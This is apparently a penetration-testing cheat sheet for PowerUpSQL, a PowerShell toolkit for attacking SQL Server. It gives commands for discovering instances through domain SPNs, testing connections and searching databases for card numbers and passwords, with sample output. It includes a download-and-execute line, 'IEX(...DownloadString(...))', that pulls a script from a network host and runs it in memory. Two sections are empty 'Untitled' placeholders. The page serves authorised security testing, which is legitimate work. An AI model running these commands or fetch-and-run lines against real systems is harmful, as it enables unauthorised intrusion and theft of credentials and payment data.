PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server

Link: https://github.com/NetSPI/PowerUpSQL

Example:

PS /opt/PowerUpSQL> Import-Module .\\PowerUpSQL.psd1  
PS /opt/PowerUpSQL> Get-SQLInstanceDomain -Verbose 
VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)... 
VERBOSE: 0 SPNs found. 
VERBOSE: Parsing SQL Server instances from SPNs... 
VERBOSE: 0 instances were found. 

Or load into memory

IEX(New-Object System.Net.WebClient).DownloadString("<http://192.168.0.1/PowerUpSQL.ps1>")

Commands:

Find information on local server

PS C:>Get-SQLInstanceLocal | Get-SQLServerInfo

Test Connection to a server

Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose –Threads 10

Search data in SQL instance:

PS C:\\> Get-SQLInstanceLocal | Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “card, password” 

ComputerName   Instance                   Database Schema Table    Column Sample           RowCount IsCC
------------   --------                   -------- ------ -----    ------ ------           -------- ----
SQLServer1     SQLServer1\\STANDARDDEV2014 testdb   dbo    tracking card   4111111111111111 2        True
SQLServer1     SQLServer1\\STANDARDDEV2014 testdb   dbo    tracking card   41111111111ASDFD 2        False

Cheatsheet

SQL Server Discovery Cheats

Untitled

SQL Server Authentication Cheats

All PowerUpSQL functions support authenticating directly to a known SQL Server instance without having to perform discovery first. You can authenticate using the current domain user credentials or provide an SQL Server login. All PowerUpSQL functions will attempt to authenticate to the provided instance as the current domain user if the username/password parameters are not provided. This also applies if you're running PowerShell through runas /netonly.

Below are some basic examples using the "Get-SQLQuery" function.

Untitled